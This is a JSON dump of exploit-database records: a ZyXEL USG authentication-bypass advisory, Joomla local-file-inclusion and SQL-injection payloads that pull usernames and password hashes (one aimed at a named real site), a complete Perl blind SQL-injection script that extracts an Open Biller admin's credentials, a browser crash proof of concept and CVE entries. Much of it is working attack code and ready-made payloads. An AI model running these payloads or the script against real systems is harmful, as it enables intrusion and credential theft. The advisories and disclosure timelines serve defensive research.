It is usually not possible to download the current\r\nconfiguration file, as this includes the password-hashes of all users.\r\nWhen the \"download\" button in the File Manager part of the web interface\r\nis pressed, a JavaScript dialogue window informs the user that this\r\noperation is not allowed. However, setting the JavaScript variable\r\n\"isAdmin\" to \"true\" (e.g. by using the JavaScript console of the\r\n\"Firebug\" extension for the Firefox web browser) disables this check and\r\nlets the user download the desired configuration file. It is also\r\npossible to directly open the URL that downloads the configuration file.\r\nThe appliances do not check the users' permissions on the server side.\r\n \r\n \r\nProof of Concept\r\n================\r\n \r\nAfter logging into the web interface, set the local JavaScript variable\r\n\"isAdmin\" to \"true\" and use the File Manager to download configuration\r\nfiles. Alternatively, the current configuration file (including the\r\npassword hashes) can also be downloaded directly by accessing the\r\nfollowing URL:\r\n \r\n https://192.168.0.1/cgi-bin/export-cgi?category=config&arg0=startup-config.conf\r\n \r\n \r\nWorkaround\r\n==========\r\n \r\nIf possible, disable the web-based administrative interface or ensure\r\notherwise that the interface is not exposed to attackers.\r\n \r\n \r\nFix\r\n===\r\n \r\nUpgrade to a firmware released on or after April 25, 2011.\r\n \r\n \r\nSecurity Risk\r\n=============\r\n \r\nThis vulnerability enables users of the role \"limited-admin\" to access\r\nconfiguration files with potentially sensitive information (like the\r\npassword hashes of all other users). 
The risk of this vulnerability is\r\nestimated as medium.\r\n \r\n \r\nHistory\r\n=======\r\n \r\n2011-03-07 Vulnerability identified\r\n2011-04-06 Customer approved disclosure to vendor\r\n2011-04-07 Vendor notified\r\n2011-04-08 Meeting with vendor\r\n2011-04-15 Vulnerability fixed by vendor\r\n2011-04-18 Test appliance and beta firmware supplied to\r\n RedTeam Pentesting, fix verified\r\n2011-04-25 Vendor released new firmwares with fix\r\n2011-04-29 Vendor confirms that other ZLD-based devices may also be\r\n affected\r\n2011-05-04 Advisory released\r\n \r\nRedTeam Pentesting likes to thank ZyXEL for the fast response and\r\nprofessional collaboration.\r\n\r\n\n\n# 0day.today [2018-03-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16040"}, {"lastseen": "2018-02-16T01:16:31", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-04-04T00:00:00", "published": "2010-04-04T00:00:00", "id": "1337DAY-ID-11614", "href": "https://0day.today/exploit/description/11614", "type": "zdt", "title": "Joomla Component redSHOP Local File Inclusion Vulnerability", "sourceData": "===========================================================\r\nJoomla Component redSHOP Local File Inclusion Vulnerability\r\n===========================================================\r\n\r\n======================================================================================================================\r\n \r\n \r\n [o] Joomla Component redSHOP Local File Inclusion Vulnerability\r\n \r\n Software : com_redshop version 1.0.x [ commercial ]\r\n Vendor : http://redcomponent.com/\r\n Author : NoGe\r\n Contact : noge[dot]code[at]gmail[dot]com\r\n Blog : http://evilc0de.blogspot.com/\r\n Home : http://antisecurity.org/\r\n \r\n \r\n======================================================================================================================\r\n \r\n \r\n [o] Exploit\r\n \r\n 
http://localhost/[path]/index.php?option=com_redshop&view=[LFI]\r\n \r\n \r\n [o] PoC\r\n \r\n http://localhost/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00\r\n \r\n \r\n======================================================================================================================\r\n\r\n\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11614"}, {"lastseen": "2018-03-20T05:18:15", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-03-23T00:00:00", "published": "2010-03-23T00:00:00", "id": "1337DAY-ID-9681", "href": "https://0day.today/exploit/description/9681", "type": "zdt", "title": "Joomla Component com_aml_2 SQL Injection Vulnerability", "sourceData": "======================================================\r\nJoomla Component com_aml_2 SQL Injection Vulnerability\r\n======================================================\r\n\r\n\r\nJoomla Component com_aml_2 SQL Injection Vulnerability\r\n========================================================\r\n \r\n####################################################################\r\n.:. Author : Metropolis\r\n \r\n.:. Home : http://metropolis.fr.cr/\r\n \r\n.:. Script : Joomla Component com_aml_2\r\n \r\n.:. 
Bug Type : SQL Injection\r\n \r\n####################################################################\r\n \r\n===[ Vulnerable File ]===\r\n \r\n/index.php?option=com_aml_2&task=annonce&page=detail&rub=immobilier&art=75 [SQL Injection]\r\n \r\n \r\n===[ ExploiT ]===\r\n \r\n75+and+1=0+union+select+1,2,3,4,concat(username,0xa,password,email),6,7,8+from+jos_users--\r\n \r\n \r\n===[ Demo ]===\r\n \r\nhttp://site.com/index.php?option=com_aml_2&task=annonce&page=detail&rub=immobilier&art=75+and+1=0+union+select+1,2,3,4,concat%28username,0xa,password,email%29,6,7,8+from+jos_users--\r\n \r\n \r\n \r\n ####################################################################\r\n \r\nVive la France !\r\n\r\n\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/9681"}, {"lastseen": "2018-02-09T09:10:39", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-09-22T00:00:00", "published": "2009-09-22T00:00:00", "id": "1337DAY-ID-9854", "href": "https://0day.today/exploit/description/9854", "type": "zdt", "title": "Joomla com_facebook SQL Injection", "sourceData": "=================================\r\nJoomla com_facebook SQL Injection\r\n=================================\r\n\r\n\r\n#############################################################################################################\r\n \r\n[ Software Information ]\r\n \r\n[+] Vendor : -\r\n[+] Download : http://joomlacode.org/gf/project/joomla-facebook/\r\n[+] version : -\r\n[+] Vulnerability : SQL injection\r\n[+] Dork : inurl:\"com_facebook\"\r\n \r\n#############################################################################################################\r\n \r\n[ Vulnerable File ]\r\n \r\nhttp://127.0.0.1/index.php?option=com_facebook&view=student&id=[INDONESIANCODER]\r\n \r\n[ Exploit ]\r\n 
\r\n-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users--\r\n \r\n[ Demo ]\r\n \r\nhttp://www.engineering.edu.sg/index.php?option=com_facebook&view=student&id=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users--\r\n \r\n#############################################################################################################\r\n\r\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/9854"}, {"lastseen": "2018-04-14T01:51:57", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-06-10T00:00:00", "published": "2009-06-10T00:00:00", "id": "1337DAY-ID-5349", "href": "https://0day.today/exploit/description/5349", "type": "zdt", "title": "Open Biller 0.1 (username) Blind SQL Injection Exploit", "sourceData": "======================================================\r\nOpen Biller 0.1 (username) Blind SQL Injection Exploit\r\n======================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n#***********************************************************************************************\r\n#***********************************************************************************************\r\n#***********************************************************************************************\r\n#\r\n#---------------------------------------------------------------------------------------------\r\n#| \t \t (Post Form login var 'username') BLIND SQLi exploit \t |\r\n#|-------------------------------------------------------------------------------------------|\r\n#| | Open Biller 0.1 |\t\t \t |\r\n#| CMS INFORMATION: \t ------------------------\t \t |\r\n#|\t\t\t\t\t\t\t\t\t\t |\r\n#|-->WEB: http://sourceforge.net/projects/geekbill/\t\t\t \t\t |\r\n#|-->DOWNLOAD: http://sourceforge.net/projects/geekbill/\t\t |\r\n#|-->DEMO: N/A\t\t\t\t\t\t\t\t\t\t 
|\r\n#|-->CATEGORY: CMS / Portal\t\t\t\t\t\t\t\t |\r\n#|-->DESCRIPTION: Open Biller aims to to be a the best open source billing |\r\n#|\t\tsystem on the planet.The system is written in PHP/MYSQL... |\r\n#|-->RELEASED: 2009-05-31\t\t\t\t\t\t\t\t |\r\n#|\t\t\t\t\t\t\t\t\t\t\t |\r\n#| CMS VULNERABILITY:\t\t\t\t\t\t\t\t\t |\r\n#|\t\t\t\t\t\t\t\t\t\t\t |\r\n#|-->TESTED ON: firefox 3\t\t\t\t\t\t |\r\n#|-->DORK: N/A\t\t\t\t\t\t\t\t\t |\r\n#|-->CATEGORY: BLIND SQLi exploit\t\t\t\t\t\t |\r\n#|-->AFFECT VERSION: CURRENT\t\t\t\t\t\t \t\t |\r\n#|-->Discovered Bug date: 2009-06-09\t\t\t\t\t\t\t |\r\n#|-->Reported Bug date: 2009-06-09\t\t\t\t\t\t\t |\r\n#|-->Fixed bug date: N/A\t\t\t\t\t\t\t\t |\r\n#|-->Info patch: N/A\t\t\t\t\t\t\t\t\t |\r\n#|-->Author: YEnH4ckEr\t\t\t\t\t\t\t\t\t |\r\n#|-->WEB/BLOG: N/A\t\t\t\t\t\t\t\t\t |\r\n#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |\r\n#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)\t\t |\r\n#---------------------------------------------------------------------------------------------\r\n#\r\n#------------\r\n#CONDITIONS:\r\n#------------\r\n#\r\n#magic quotes=OFF\r\n#\r\n#---------------------------------------\r\n#PROOF OF CONCEPT (SQL INJECTION):\r\n#---------------------------------------\r\n#\r\n#POST http://[HOST]/[PATH]/index.php HTTP/1.1\r\n#Host: [HOST]\r\n#User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10\r\n#Referer: http://[HOST]/[PATH]/\r\n#\r\n#username=%27+or+1%3D0%23&pass=1111&submit=Login\r\n#\r\n#username=%27+or+1%3D0%23&pass=1111&submit=Login\r\n#\r\n#\r\nuse LWP::UserAgent;\r\nuse HTTP::Request;\r\n#Subroutines\r\nsub lw\r\n{\r\n\tmy $SO = $^O;\r\n\tmy $linux = \"\";\r\n\tif (index(lc($SO),\"win\")!=-1){\r\n\t\t$linux=\"0\";\r\n\t}else{\r\n\t\t$linux=\"1\";\r\n\t}\t\t\r\n\tif($linux){\r\n\t\tsystem(\"clear\");\r\n\t}\r\n\telse{\r\n\t\tsystem(\"cls\");\r\n\t\tsystem (\"title Open Biller 0.1 Blind 
SQL Injection Exploit\");\r\n\t\tsystem (\"color 04\");\r\n\t}\r\n}\r\nsub request {\r\n\tmy $userag = LWP::UserAgent->new;\r\n\t$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\r\n\t$request = HTTP::Request -> new(POST => $_[0]);\r\n\t$request->referer($_[0]);\r\n\t$request->content_type('application/x-www-form-urlencoded');\r\n\t$request->content($_[1]);\r\n\tmy $outcode= $userag->request($request)->as_string;\r\n\t#print $outcode; #--> Active this line for debugger mode\r\n\t#print $request->as_string; #--> Active this line for debugger mode\r\n\treturn $outcode;\r\n}\r\nsub error {\r\nprint \"\\t------------------------------------------------------------\\n\";\r\n\tprint \"\\tWeb isn't vulnerable!\\n\\n\";\r\n\tprint \"\\t--->Maybe:\\n\\n\";\r\n\tprint \"\\t\\t1.-Patched.\\n\";\r\n\tprint \"\\t\\t2.-Bad path or host.\\n\";\r\n\tprint \"\\t\\t5.-Magic quotes ON'.\\n\";\r\n\tprint \"\\t\\tEXPLOIT FAILED!\\n\";\r\n\tprint \"\\t------------------------------------------------------------\\n\";\r\n}\r\nsub testedblindsql {\r\n\tprint \"\\t-----------------------------------------------------------------\\n\";\r\n\tprint \"\\tWEB MAYBE BE VULNERABLE!\\n\\n\";\r\n\tprint \"\\tTested Blind SQL Injection.\\n\";\t\t\r\n\tprint \"\\tStarting exploit...\\n\"; \r\n\tprint \"\\t-----------------------------------------------------------------\\n\\n\";\r\n}\r\nsub helper {\r\n\tprint \"\\n\\t[!!!] Open Biller 0.1 Blind SQL Injection Exploit\\n\";\r\n\tprint \"\\t[!!!] USAGE MODE: [!!!]\\n\";\r\n\tprint \"\\t[!!!] perl $0 [HOST] [PATH]\\n\";\r\n\tprint \"\\t[!!!] [HOST]: Web.\\n\";\r\n\tprint \"\\t[!!!] [PATH]: Home Path.\\n\";\r\n\tprint \"\\t[!!!] 
Example: perl $0 'www.example.com' 'demo'\\n\";\r\n}\r\nsub brute_length{\r\n#Username length\r\n$exit=0;\r\n$i=0;\r\nwhile($exit==0){\r\n\tmy $blindsql=\"username='+OR+1=1+AND+(SELECT+length(username)+FROM+users+WHERE+ID=1)=\".$i++.\"#&pass=1111&submit=Login\"; #injected code\r\n\t$output=&request($_[0],$blindsql);\r\n\tif($output =~ (/Incorrect password, please try again./)){\r\n\t\t$exit=1;\r\n\t}else{\r\n\t\t$exit=0;\r\n\t}\r\n\t#This is the max length of username\r\n\tif($i>60){\r\n\t&error;\r\n\texit(1);\r\n\t}\r\n}\r\n#Save column length\r\n$length=$i-1;\r\nprint \"\\t<<<<<--------------------------------------------------------->>>>>\\n\";\r\nprint \"\\tLength catched!\\n\";\r\nprint \"\\tLength Username --> \".$length.\"\\n\";\r\nprint \"\\tWait several minutes...\\n\";\r\nprint \"\\t<<<<<--------------------------------------------------------->>>>>\\n\\n\";\r\nreturn $length;\r\n}\r\nsub exploiting {\r\n#Bruteforcing values\r\n$values=\"\";\r\n$k=1;\r\n\t$z=45;\r\n\twhile(($k<=$_[1]) && ($z<=126)){\r\n\t\tmy $blindsql=\"username='+OR+1=1+AND+ascii(substring((SELECT+\".$_[2].\"+FROM+users+WHERE+ID=1),\".$k.\",1))=\".$z.\"#&pass=1111&submit=Login\";\r\n\t\t$output=&request($_[0],$blindsql);\r\n\t\tif($output =~ (/Incorrect password, please try again./))\r\n\t\t{\r\n\t\t\t$values=$values.chr($z);\r\n\t\t\t$k++;\r\n\t\t\t$z=45;\r\n\t\t}\r\n#new char\r\n\t$z++; \r\n\t}\r\nreturn $values;\r\n}\r\n#Main\r\n&lw;\r\nprint \"\\t#######################################################\\n\\n\";\r\nprint \"\\t#######################################################\\n\\n\";\r\nprint \"\\t## Open Biller 0.1 Blind SQL Injection Exploit ##\\n\\n\";\r\nprint \"\\t## Blind SQL Injection Exploit ##\\n\\n\"; \r\nprint \"\\t## ++Conditions: magic_quotes=OFF ##\\n\\n\";\r\nprint \"\\t## Author: Y3nh4ck3r ##\\n\\n\";\r\nprint \"\\t## Proud to be Spanish! 
##\\n\\n\";\r\nprint \"\\t#######################################################\\n\\n\";\r\nprint \"\\t#######################################################\\n\\n\";\r\n#Init variables\r\nmy $host=$ARGV[0];\r\nmy $path=$ARGV[1];\r\n$numArgs = $#ARGV + 1;\r\nif($numArgs<=1) \r\n\t{\r\n\t\t&helper;\r\n\t\texit(1);\t\r\n\t}\t\r\n#Build uri\r\nmy $finalhost=\"http://\".$host.\"/\".$path.\"/index.php\";\r\n$finalrequest = $finalhost;\t\r\n#Testing blind sql injection and magic_quotes (any error?)\r\n$send_post1=\"username=%27+or+1%3D1%23&pass=1111&submit=Login\";\r\n$output1=&request($finalrequest,$send_post1);\r\n$send_post2=\"username=%27+or+1%3D0%23&pass=1111&submit=Login\";\r\n$output2=&request($finalrequest,$send_post2);\r\nif ($output1 eq $output2)\r\n{ \r\n\t#Not injectable\r\n\t&error;\r\n\texit(1); \r\n}else{ \r\n\t#blind sql injection is available\r\n\t&testedblindsql;\r\n}\r\n#Bruteforcing length\r\n$length_user=&brute_length($finalrequest);\t\r\n#Bruteforcing username...\r\n$user=&exploiting($finalrequest,$length_user,'username');\r\n#Bruteforcing password md5 hash...\r\n$pwhash=&exploiting($finalrequest,32,'password');\r\n#final checking\r\nif((!$user) || (!$pwhash)){\r\n\t&error;\r\n\texit(1);\r\n}\r\nprint \"\\n\\t\\t*************************************************\\n\";\r\nprint \"\\t\\t********* EXPLOIT EXECUTED SUCCESSFULLY ********\\n\";\r\nprint \"\\t\\t*************************************************\\n\\n\";\r\nprint \"\\t\\tAdmin-username: \".$user.\"\\n\";\r\nprint \"\\t\\tAdmin-password: \".$pwhash.\"\\n\\n\";\r\nprint \"\\n\\t\\t<<----------------------FINISH!-------------------->>\\n\\n\";\r\nexit(1);\r\n#Ok...all job done\r\n\r\n\r\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5349"}], "zeroscience": [{"lastseen": "2019-11-11T16:11:40", "bulletinFamily": "exploit", "description": "Title: NUUO CSRF Add Admin Exploit \nAdvisory ID: [ZSL-2016-5349](<ZSL-2016-5349.php>) 
\nType: Local/Remote \nImpact: Cross-Site Scripting \nRisk: (3/5) \nRelease Date: 06.08.2016 \n\n\n##### Summary\n\nNUUO NVRmini 2 is the lightweight, portable NVR solution with NAS functionality. Setup is simple and easy, with automatic port forwarding settings built in. NVRmini 2 supports POS integration, making this the perfect solution for small retail chain stores. NVRmini 2 also comes full equipped as a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping and RAID functions for data protection. Choose NVR and know that your valuable video data is safe, always. \n\n##### Description\n\nThe application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. \n\n##### Vendor\n\nNUUO Inc. - <http://www.nuuo.com>\n\n##### Affected Version\n\n<=3.0.8 (NE-4160, NT-4040) \n\n##### Tested On\n\nGNU/Linux 3.0.8 (armv7l) \nGNU/Linux 2.6.31.8 (armv5tel) \nlighttpd/1.4.28 \nPHP/5.5.3 \n\n##### Vendor Status\n\n[14.01.2016] Vulnerability discovered. \n[01.02.2016] Vendor contacted. \n[02.02.2016] Vendor responds asking explanation. \n[03.02.2016] Explained to vendor about the issues and risk. \n[04.02.2016] Vendor ignores with confusion. \n[10.02.2016] Sent another e-mail probe to several accounts for respond. \n[16.02.2016] No response from the vendor. \n[16.04.2016] Final try to get communication from the vendor and report issues. \n[05.08.2016] No response from the vendor. \n[06.08.2016] Public security advisory released. 
\n\n##### PoC\n\n[nuuo_csrf.html](<../../codes/nuuo_csrf.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/40210/> \n[2] <https://cxsecurity.com/issue/WLB-2016080069> \n[3] <https://packetstormsecurity.com/files/138221>\n\n##### Changelog\n\n[06.08.2016] - Initial release \n[09.06.2016] - Added reference [1], [2] and [3] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2016-08-06T00:00:00", "published": "2016-08-06T00:00:00", "id": "ZSL-2016-5349", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5349.php", "title": "NUUO CSRF Add Admin Exploit", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n<!--\nbody {\n\tbackground-color: #000;\n}\nbody,td,th {\n\tfont-family: Verdana, Geneva, sans-serif;\n}\na:link {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:visited {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:hover {\n\ttext-decoration: underline;\n\tcolor: #666;\n}\na:active {\n\ttext-decoration: none;\n}\n-->\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/nuuo_csrf.txt"}, {"lastseen": "2019-11-11T16:11:44", "bulletinFamily": "exploit", "description": "Title: Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS) \nAdvisory ID: [ZSL-2014-5190](<ZSL-2014-5190.php>) 
\nType: Local/Remote \nImpact: DoS \nRisk: (3/5) \nRelease Date: 30.06.2014 \n\n\n##### Summary\n\nSpark Browser is a free Internet browser with very sharp UIs and cool utilities. It's based on the Chromium technology platform, giving it fast browsing capabilities. \n\n##### Description\n\nSpark Browser version 26.5.9999.3511 allows remote attackers to cause a denial of service (application crash) resulting in stack overflow via nested calls to the window.print javascript function. \n\n##### Vendor\n\nBaidu, Inc. - <http://www.baidu.com>\n\n##### Affected Version\n\n26.5.9999.3511 \n\n##### Tested On\n\nMicrosoft Windows 7 Professional SP1 (EN) \nMicrosoft Windows 7 Ultimate SP1 (EN) \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[spark_dos.html](<../../codes/spark_dos.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://packetstormsecurity.com/files/127282> \n[2] <http://www.securityfocus.com/bid/68288> \n[3] <http://osvdb.org/show/osvdb/108605> \n[4] <http://www.exploit-db.com/exploits/33951/> \n[5] <http://cxsecurity.com/issue/WLB-2014070013> \n[6] <http://www.vfocus.net/art/20140701/11614.html> \n[7] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-5349>\n\n##### Changelog\n\n[30.06.2014] - Initial release \n[01.07.2014] - Added reference [1] and [2] \n[02.07.2014] - Added reference [3] and [4] \n[03.07.2014] - Added reference [5] and [6] \n[05.10.2014] - Added reference [7] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2014-06-30T00:00:00", "published": "2014-06-30T00:00:00", "id": "ZSL-2014-5190", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php", "title": "Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link 
rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n<!--\nbody {\n\tbackground-color: #000;\n}\nbody,td,th {\n\tfont-family: Verdana, Geneva, sans-serif;\n}\na:link {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:visited {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:hover {\n\ttext-decoration: underline;\n\tcolor: #666;\n}\na:active {\n\ttext-decoration: none;\n}\n-->\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/spark_dos.txt"}], "cve": [{"lastseen": "2019-05-29T18:13:47", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in Baidu Spark Browser 26.5.9999.3511 allows remote attackers to cause a denial of service (application crash) via nested calls to the window.print JavaScript function.", "modified": "2014-08-20T17:36:00", "id": "CVE-2014-5349", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5349", "published": "2014-08-19T19:55:00", "title": "CVE-2014-5349", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T20:11:22", "bulletinFamily": "exploit", "description": "Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS). CVE-2014-5349. 
Dos exploit for windows platform", "modified": "2014-07-02T00:00:00", "published": "2014-07-02T00:00:00", "id": "EDB-ID:33951", "href": "https://www.exploit-db.com/exploits/33951/", "type": "exploitdb", "title": "Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow Vulnerability DoS", "sourceData": "<!--\r\n\r\nBaidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)\r\n\r\n\r\nVendor: Baidu, Inc.\r\nProduct web page: http://www.baidu.com\r\nAffected version: 26.5.9999.3511\r\n\r\nSummary: Spark Browser is a free Internet browser with very\r\nsharp UIs and cool utilities. It's based on the Chromium\r\ntechnology platform, giving it fast browsing capabilities.\r\n\r\nDesc: Spark Browser version 26.5.9999.3511 allows remote\r\nattackers to cause a denial of service (application crash)\r\nresulting in stack overflow via nested calls to the window.print\r\njavascript function.\r\n\r\n-----------------------------------------------------------------\r\n\r\n(153c.14f4): Stack overflow - code c00000fd (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=000000b0 ebx=003d0000 ecx=003d0000 edx=5000016b esi=00000000 edi=0000010c\r\neip=77e0decf esp=03d23000 ebp=03d230c4 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202\r\nntdll!memcpy+0xbb8f:\r\n77e0decf 56 push esi\r\n\r\n-----------------------------------------------------------------\r\n\r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2014-5190\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php\r\n\r\n\r\n28.06.2014\r\n\r\n-->\r\n\r\n\r\n<html>\r\n<title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>\r\n<body bgcolor=\"#50708C\">\r\n<center>\r\n<p><font 
color=\"#e3e3e3\">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p>\r\n<button onClick=crash()>Execute!</button>\r\n</center>\r\n<script>\r\nfunction crash(){\r\n\twindow.print();\r\n\tcrash();\r\n}\r\n</script>\r\n</body>\r\n</html>\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33951/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "description": "Advisory: Authentication Bypass in Configuration Import and Export of\r\n ZyXEL ZyWALL USG Appliances\r\n\r\nUnauthenticated users with access to the management web interface of\r\ncertain ZyXEL ZyWALL USG appliances can download and upload\r\nconfiguration files, that are applied automatically.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: ZyXEL USG (Unified Security Gateway) appliances\r\n ZyWALL USG-20\r\n ZyWALL USG-20W\r\n ZyWALL USG-50\r\n ZyWALL USG-100\r\n ZyWALL USG-200\r\n ZyWALL USG-300\r\n ZyWALL USG-1000\r\n ZyWALL USG-1050\r\n ZyWALL USG-2000\r\n Possibly other ZLD-based products\r\nAffected Versions: Firmware Releases before April 25, 2011\r\nFixed Versions: Firmware Releases from or after April 25, 2011\r\nVulnerability Type: Authentication Bypass\r\nSecurity Risk: high\r\nVendor URL: http://www.zyxel.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-003\r\nAdvisory Status: published\r\nCVE: GENERIC-MAP-NOMATCH\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n``The ZyWALL USG (Unified Security Gateway) Series is the "third\r\ngeneration" ZyWALL featuring an all-new platform. It provides greater\r\nperformance protection, as well as a deep packet inspection security\r\nsolution for small businesses to enterprises alike. 
It embodies a\r\nStateful Packet Inspection (SPI) firewall, Anti-Virus, Intrusion\r\nDetection and Prevention (IDP), Content Filtering, Anti-Spam, and VPN\r\n(IPSec/SSL/L2TP) in one box. This multilayered security safeguards your\r\norganization's customer and company records, intellectual property, and\r\ncritical resources from external and internal threats.''\r\n\r\n(From the vendor's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nDuring a penetration test, a ZyXEL ZyWALL USG appliance was found and\r\ntested for security vulnerabilities. The following sections first\r\ndescribe, how the appliance's filesystem can be extracted from the\r\nencrypted firmware upgrade zip files. Afterwards it is shown, how\r\narbitrary configuration files can be up- and downloaded from the\r\nappliance. This way, a custom user account with a chosen password can\r\nbe added to the running appliance without the need of a reboot.\r\n\r\n\r\nDecrypting the ZyWALL Firmware Upgrade Files\r\n--------------------------------------------\r\n\r\nFirmware upgrade files for ZyXEL ZyWALL USG appliances consist of a\r\nregularly compressed zip file, which contains, among others, two\r\nencrypted zip files with the main firmware. For example, the current\r\nfirmware version 2.21(BQD.2) for the ZyWALL USG 20 ("ZyWALL USG\r\n20_2.21(BDQ.2)C0.zip") contains the following files:\r\n\r\n -rw-r--r-- 1 user user 43116374 Sep 30 2010 221BDQ2C0.bin\r\n -rw-r--r-- 1 user user 7354 Sep 30 2010 221BDQ2C0.conf\r\n -rw-r--r-- 1 user user 28395 Sep 30 2010 221BDQ2C0.db\r\n -rw-r--r-- 1 user user 703402 Oct 12 17:48 221BDQ2C0.pdf\r\n -rw-r--r-- 1 user user 3441664 Sep 30 2010 221BDQ2C0.ri\r\n -rw-r--r-- 1 user user 231 Sep 30 2010 firmware.xml\r\n\r\nThe files 221BDQ2C0.bin and 221BDQ2C0.db are encrypted zip files that\r\nrequire a password for decompression. 
